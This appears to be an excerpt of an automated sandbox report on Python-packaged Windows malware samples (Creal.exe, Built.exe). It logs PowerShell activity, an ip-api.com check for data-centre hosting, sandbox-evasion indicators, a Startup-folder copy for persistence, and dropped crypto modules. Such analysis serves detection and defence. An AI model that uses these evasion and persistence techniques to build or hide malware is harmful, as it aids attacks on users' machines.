              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92476C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,2_2_00007FF6D92476C0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935D8816 sgdt fword ptr [rax]4_2_00007FFD935D8816
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7877
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1614
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7802
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1683
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_cffi_backend.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_ARC4.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\pyexpat.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_keccak.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_poly1305.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_strxor.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA512.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_Salsa20.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_wmi.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2b.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_uuid.pydJump to dropped file
